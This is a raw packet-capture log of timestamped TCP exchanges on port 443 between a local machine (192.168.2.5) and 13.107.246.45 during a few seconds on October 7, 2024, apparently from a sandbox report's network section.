Oct 7, 2024 03:15:26.058947086 CEST	443	49749	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.061995029 CEST	49755	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.062088013 CEST	443	49755	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.062247038 CEST	49755	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.062446117 CEST	49755	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.062479019 CEST	443	49755	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.116882086 CEST	443	49751	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.117810011 CEST	49751	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.117842913 CEST	443	49751	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.118464947 CEST	49751	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.118469954 CEST	443	49751	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.215708971 CEST	443	49751	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.215795040 CEST	443	49751	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.215876102 CEST	49751	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.216330051 CEST	49751	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.216330051 CEST	49751	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.216378927 CEST	443	49751	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.216392994 CEST	443	49751	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.219543934 CEST	49756	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.219594955 CEST	443	49756	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.219804049 CEST	49756	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.219949007 CEST	49756	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.219963074 CEST	443	49756	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.321486950 CEST	49747	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.321532011 CEST	443	49747	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.628334999 CEST	443	49752	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.628880024 CEST	49752	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.628978968 CEST	443	49752	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.629446030 CEST	49752	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.629461050 CEST	443	49752	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.654866934 CEST	443	49753	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.655322075 CEST	49753	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.655344963 CEST	443	49753	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.655985117 CEST	49753	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.655988932 CEST	443	49753	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.660981894 CEST	443	49754	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.661681890 CEST	49754	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.661698103 CEST	443	49754	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.662405968 CEST	49754	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.662410021 CEST	443	49754	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.699692965 CEST	443	49755	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.712668896 CEST	49755	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.712766886 CEST	443	49755	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.713088036 CEST	49755	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.713103056 CEST	443	49755	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.727670908 CEST	443	49752	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.727822065 CEST	443	49752	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.727881908 CEST	49752	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.728709936 CEST	49752	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.728749037 CEST	443	49752	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.753957987 CEST	443	49753	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.754044056 CEST	443	49753	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.754230976 CEST	49753	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.755034924 CEST	49753	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.755047083 CEST	443	49753	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.759453058 CEST	443	49754	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.759521008 CEST	443	49754	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.759572029 CEST	49754	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.760124922 CEST	49754	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.760130882 CEST	443	49754	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.760139942 CEST	49754	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.760144949 CEST	443	49754	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.761837006 CEST	49757	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.761882067 CEST	443	49757	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.762026072 CEST	49757	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.762778997 CEST	49757	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.762797117 CEST	443	49757	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.766392946 CEST	49758	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.766417027 CEST	443	49758	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.766501904 CEST	49758	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.767257929 CEST	49758	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.767271996 CEST	443	49758	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.770939112 CEST	49759	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.770984888 CEST	443	49759	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.771047115 CEST	49759	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.771863937 CEST	49759	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.771876097 CEST	443	49759	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.808440924 CEST	443	49755	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.808518887 CEST	443	49755	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.808809996 CEST	49755	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.816343069 CEST	49755	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.816392899 CEST	443	49755	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.816427946 CEST	49755	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.816445112 CEST	443	49755	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.824973106 CEST	49760	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.825023890 CEST	443	49760	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.825088978 CEST	49760	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.827007055 CEST	49760	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.827020884 CEST	443	49760	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.881321907 CEST	443	49756	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.930867910 CEST	49756	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.966751099 CEST	49756	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.966777086 CEST	443	49756	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:26.970626116 CEST	49756	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:26.970633030 CEST	443	49756	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.078839064 CEST	443	49756	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.079008102 CEST	443	49756	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.079075098 CEST	49756	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.142299891 CEST	49756	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.142344952 CEST	443	49756	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.142363071 CEST	49756	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.142369986 CEST	443	49756	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.191406012 CEST	49761	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.191453934 CEST	443	49761	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.191570997 CEST	49761	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.192048073 CEST	49761	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.192065001 CEST	443	49761	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.621284962 CEST	443	49759	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.621735096 CEST	443	49757	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.622134924 CEST	49759	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.622179985 CEST	443	49759	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.622601032 CEST	49759	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.622607946 CEST	443	49759	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.622669935 CEST	443	49760	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.622850895 CEST	49757	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.622869015 CEST	443	49757	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.623408079 CEST	49757	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.623410940 CEST	443	49757	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.623477936 CEST	49760	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.623487949 CEST	443	49760	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.623872042 CEST	49760	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.623878956 CEST	443	49760	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.624851942 CEST	443	49758	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.625296116 CEST	49758	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.625303030 CEST	443	49758	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.625818014 CEST	49758	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.625821114 CEST	443	49758	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.723553896 CEST	443	49759	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.723617077 CEST	443	49759	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.723670959 CEST	49759	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.723887920 CEST	49759	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.723913908 CEST	443	49759	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.723938942 CEST	49759	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.723947048 CEST	443	49759	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.725456953 CEST	443	49760	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.725584984 CEST	443	49760	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.725636959 CEST	49760	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.725671053 CEST	443	49757	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.725753069 CEST	443	49757	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.725781918 CEST	49760	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.725788116 CEST	443	49760	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.725805998 CEST	49760	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.725809097 CEST	49757	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.725811005 CEST	443	49760	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.726613045 CEST	49757	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.726613045 CEST	49757	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.726635933 CEST	443	49757	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.726649046 CEST	443	49757	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.728619099 CEST	443	49758	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.728763103 CEST	443	49758	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.728840113 CEST	49758	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.729043961 CEST	49762	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.729070902 CEST	443	49762	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.729219913 CEST	49762	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.730478048 CEST	49764	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.730489969 CEST	49763	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.730515957 CEST	443	49763	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.730516911 CEST	443	49764	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.730590105 CEST	49764	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.730659008 CEST	49763	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.730730057 CEST	49763	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.730739117 CEST	443	49763	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.730861902 CEST	49758	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.730861902 CEST	49758	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.730870962 CEST	443	49758	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.730881929 CEST	443	49758	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.730993986 CEST	49764	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.731007099 CEST	443	49764	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.731782913 CEST	49762	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.731798887 CEST	443	49762	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.733383894 CEST	49765	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.733423948 CEST	443	49765	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.733550072 CEST	49765	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.733616114 CEST	49765	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.733628988 CEST	443	49765	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.826776981 CEST	443	49761	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.827605009 CEST	49761	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.827620029 CEST	443	49761	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.828460932 CEST	49761	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.828468084 CEST	443	49761	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.925940990 CEST	443	49761	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.926038980 CEST	443	49761	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.926235914 CEST	49761	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.926506996 CEST	49761	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.926506996 CEST	49761	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.926527977 CEST	443	49761	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.926539898 CEST	443	49761	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.929335117 CEST	49766	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.929377079 CEST	443	49766	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:27.929462910 CEST	49766	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.929792881 CEST	49766	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:27.929810047 CEST	443	49766	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.372653961 CEST	443	49764	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.373506069 CEST	49764	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.373526096 CEST	443	49764	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.374166012 CEST	49764	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.374172926 CEST	443	49764	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.386843920 CEST	443	49762	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.387290001 CEST	49762	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.387312889 CEST	443	49762	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.387734890 CEST	49762	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.387742043 CEST	443	49762	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.419265985 CEST	443	49763	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.420211077 CEST	49763	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.420258045 CEST	443	49763	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.420811892 CEST	49763	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.420818090 CEST	443	49763	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.452416897 CEST	443	49765	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.453363895 CEST	49765	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.453409910 CEST	443	49765	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.454240084 CEST	49765	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.454257011 CEST	443	49765	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.473113060 CEST	443	49764	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.473181009 CEST	443	49764	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.473294973 CEST	49764	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.473639965 CEST	49764	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.473658085 CEST	443	49764	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.473669052 CEST	49764	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.473674059 CEST	443	49764	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.477845907 CEST	49767	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.477870941 CEST	443	49767	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.477991104 CEST	49767	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.478180885 CEST	49767	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.478193045 CEST	443	49767	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.507527113 CEST	443	49762	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.507688046 CEST	443	49762	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.507780075 CEST	49762	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.507780075 CEST	49762	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.507814884 CEST	49762	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.507838011 CEST	443	49762	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.510282993 CEST	49768	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.510334015 CEST	443	49768	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.510411024 CEST	49768	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.510562897 CEST	49768	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.510581970 CEST	443	49768	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.521521091 CEST	443	49763	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.521627903 CEST	443	49763	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.521689892 CEST	49763	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.521779060 CEST	49763	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.521795034 CEST	443	49763	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.521851063 CEST	49763	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.521862984 CEST	443	49763	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.524266958 CEST	49769	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.524358988 CEST	443	49769	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.524446964 CEST	49769	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.524539948 CEST	49769	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.524571896 CEST	443	49769	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.556122065 CEST	443	49765	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.556220055 CEST	443	49765	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.556271076 CEST	49765	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.556389093 CEST	49765	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.556389093 CEST	49765	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.556412935 CEST	443	49765	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.556418896 CEST	443	49765	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.558623075 CEST	49770	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.558655024 CEST	443	49770	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.558881998 CEST	49770	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.559034109 CEST	49770	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.559062004 CEST	443	49770	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.643800020 CEST	443	49766	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.644380093 CEST	49766	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.644417048 CEST	443	49766	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.644893885 CEST	49766	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.644901991 CEST	443	49766	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.748562098 CEST	443	49766	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.748661995 CEST	443	49766	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.749459028 CEST	49766	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.749459028 CEST	49766	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.749543905 CEST	49766	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.749569893 CEST	443	49766	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.752696991 CEST	49771	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.752739906 CEST	443	49771	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:28.752865076 CEST	49771	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.753277063 CEST	49771	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:28.753293037 CEST	443	49771	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.111922979 CEST	443	49767	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.112909079 CEST	49767	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.112945080 CEST	443	49767	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.113183975 CEST	49767	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.113189936 CEST	443	49767	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.150985003 CEST	443	49768	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.151926994 CEST	49768	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.151961088 CEST	443	49768	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.152563095 CEST	49768	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.152570009 CEST	443	49768	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.173777103 CEST	443	49769	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.174344063 CEST	49769	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.174385071 CEST	443	49769	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.175254107 CEST	49769	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.175271988 CEST	443	49769	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.195898056 CEST	443	49770	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.196383953 CEST	49770	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.196403980 CEST	443	49770	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.197161913 CEST	49770	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.197168112 CEST	443	49770	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.212323904 CEST	443	49767	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.212450981 CEST	443	49767	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.212548018 CEST	49767	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.212750912 CEST	49767	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.212768078 CEST	443	49767	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.212778091 CEST	49767	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.212783098 CEST	443	49767	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.230376005 CEST	49772	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.230475903 CEST	443	49772	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.230839968 CEST	49772	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.231400013 CEST	49772	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.231430054 CEST	443	49772	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.249042988 CEST	443	49768	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.249211073 CEST	443	49768	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.249315023 CEST	49768	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.249469995 CEST	49768	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.249469995 CEST	49768	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.249490976 CEST	443	49768	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.249504089 CEST	443	49768	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.259377956 CEST	49773	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.259427071 CEST	443	49773	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.259531975 CEST	49773	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.260896921 CEST	49773	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.260911942 CEST	443	49773	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.272623062 CEST	443	49769	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.272769928 CEST	443	49769	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.272967100 CEST	49769	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.273438931 CEST	49769	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.273452997 CEST	443	49769	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.273479939 CEST	49769	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.273485899 CEST	443	49769	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.278433084 CEST	49774	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.278453112 CEST	443	49774	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.278709888 CEST	49774	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.278808117 CEST	49774	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.278822899 CEST	443	49774	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.295011044 CEST	443	49770	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.295145988 CEST	443	49770	13.107.246.45	192.168.2.5
